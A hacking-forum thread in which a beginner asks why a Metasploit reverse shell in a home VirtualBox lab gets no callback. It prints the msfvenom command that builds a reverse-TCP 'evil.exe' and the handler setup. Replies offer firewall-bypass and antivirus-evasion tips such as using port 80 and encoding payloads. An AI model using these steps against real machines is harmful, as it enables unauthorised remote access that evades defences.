user0001

First windows/shell/reverse_tcp stuck

6 posts in this topic

This is my first reverse shell.  I used    

msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe

                        I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type      

use exploit/multi/handler       set payload windows/shell/reverse_tcp                      set lport 4444               set lhost mykalivmip                exploit  

     

set lhost mykalivmip
exploit

I also tried 

set END SESSION ON START=false

right before exploit and that didn' work either.  I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host ubunutu.  I also tried a similiar windows meterpreter reverse tcp and get the same thing.  This is what shows after exploit   I also double click the evil.exe file in windows after exploit and get this

[*] Started reverse TCP handler on mykalivmip:4444 
[*] Starting the payload handler...

It just gets stuck on this.

Edited by user0001
0

Share this post


Link to post
Share on other sites

Looks like possible Windows firewall? I'd run wireshark or even Microsofts old packet analyzer that has the ability to watch network traffic by application or PID. Then see what's going wrong. 

 

Go into Windows firewall and make sure the reversed host is allowed outbound connections from application. I'd set it as a trusted host. If you look at some back posts. A very savvy  binrev member (I think his handle was something like Aghaster), did some research on circumventing Windows Firewall for his custom key logger. That is if Windows firewall is in fact the problem. But that's where I'd look here. :-)

 

I am assuming networking between each host has been confirmed as working. 

Edited by tekio
0

Share this post


Link to post
Share on other sites

Ok, I know this is going to sound stupid but...

Did you actually run it? If you did then probably could be what tekio said your firewall could be blocking the out going connection. It also might be your antivirus. It doesn't look like you encoded the payload so if you have anti virus when you upload the payload to the system and try to run it the antivirus will scan the program and work out its a malicious file then quarantine and/or delete it.

Try setting the port for the TCP reverse shell to 80 (HTTP) or using an actually HTTP specific payload.

Port 80 is usually not blocked by your firewall so all traffic on port 80 is just allowed to go through. This is because port 80 is the port web traffic travels on and we can't go around blocking all are web traffic, can we? If you want just disable your firewall. When it comes to antivirus you need to encode your payload which you can do with msf venom. Encoding a payload makes it harder for antivirus to detect. TBH I can't be fucked looking up the syntax in msfvenom on how to do this so just look up how to encode a payload in msfvenom and you should be fine. Of course this is not guaranteed to work. It might be best just to disable your antivirus altogether if you're just learning.

If you are interested in this stuff I'd recommend you read "Penetration testing: a hands-on introduction to hacking". I read it and it's where most of my computer hacking knowledge comes from. Granted, it will not give you enough background to go out and hack highly secured environments. In order to be a real hacker you need to know more then just how to use some tools, you need to know how computers actually work.

Anyways best of luck to you :)

Here is the book https://repo.zenk-security.com/Magazine E-book/Penetration Testing - A hands-on introduction to Hacking.pdf

Regards,

ReAiFi

Edited by scratchytcarrier
too bad it's not where your knowledge of capitalization and punctuation could've also come from.
1

Share this post


Link to post
Share on other sites

In order to be a real hacker you need to know more then just how to use some tools, you need to know how computers actually work.



In order to be a "real hacker" (whatever the fuck that means) you need to have more than knowledge of how computers work, you need to have the will to experiment, make mistakes, learn from them, try things and work them out, first and foremost. The rest will eventually fall into place on its own.

1

Share this post


Link to post
Share on other sites
Quote

In order to be a real hacker you need to know more then just how to use some tools, you need to know how computers actually work.

 

 

A noob could spend 10-15 years in sheer frustration,  if they start out with coding exploits from scratch. :-P

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now